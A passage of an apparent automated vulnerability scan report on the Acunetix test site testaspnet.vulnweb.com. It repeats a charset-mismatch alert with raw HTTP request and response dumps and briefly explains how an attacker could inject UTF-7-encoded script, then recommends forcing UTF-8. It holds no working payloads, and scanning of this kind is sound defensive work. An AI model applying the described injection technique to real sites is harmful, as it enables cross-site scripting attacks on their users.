          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:15 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Force UTF-8 for all text content in both the HTTP header and meta tags in HTML or encoding declarations in XML.

        3. GET http://testaspnet.vulnweb.com/default.aspx
          Alert description

          This check identifies responses where the HTTP Content-Type header declares a charset different from the charset defined by the body of the HTML or XML. When there's a charset mismatch between the HTTP header and content body Web browsers can be forced into an undesirable content-sniffing mode to determine the content's correct character set.

          An attacker could manipulate content on the page to be interpreted in an encoding of their choice. For example, if an attacker can control content at the beginning of the page, they could inject script using UTF-7 encoded text and manipulate some browsers into interpreting that text.

          Other info

          There was a charset mismatch between the HTTP Header and the META content-type encoding declarations: [utf-8] and [windows-1252] do not match.

          Request
          Request line and header section (316 bytes)
          GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Force UTF-8 for all text content in both the HTTP header and meta tags in HTML or encoding declarations in XML.

        4. POST http://testaspnet.vulnweb.com/default.aspx
          Alert description

          This check identifies responses where the HTTP Content-Type header declares a charset different from the charset defined by the body of the HTML or XML. When there's a charset mismatch between the HTTP header and content body Web browsers can be forced into an undesirable content-sniffing mode to determine the content's correct character set.

          An attacker could manipulate content on the page to be interpreted in an encoding of their choice. For example, if an attacker can control content at the beginning of the page, they could inject script using UTF-7 encoded text and manipulate some browsers into interpreting that text.

          Other info

          There was a charset mismatch between the HTTP Header and the META content-type encoding declarations: [utf-8] and [windows-1252] do not match.

          Request
          Request line and header section (388 bytes)
          POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com
          Content-Length: 1025
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1025 bytes)
